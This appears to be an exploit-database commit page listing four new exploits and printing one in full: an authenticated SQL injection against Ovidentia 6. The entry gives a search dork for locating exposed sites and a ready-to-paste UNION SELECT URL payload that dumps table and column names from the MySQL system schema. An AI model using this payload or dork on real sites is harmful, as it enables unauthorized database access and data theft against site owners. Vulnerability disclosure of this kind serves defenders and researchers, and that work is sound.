06a83531de
4 changes to exploits/shellcodes Ovidentia 6 - 'id' SQL injection (Authenticated) Linksys EA7500 2.0.8.194281 - Cross-Site Scripting Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)
7 lines
No EOL
402 B
Text
7 lines
No EOL
402 B
Text
# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated)
|
|
# Exploit Author: Felipe Prates Donato (m4ud)
|
|
# Vendor Homepage: http://www.ovidentia.org
|
|
# Version: 6
|
|
# DORK : "Powered by Ovidentia"
|
|
|
|
http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2-- |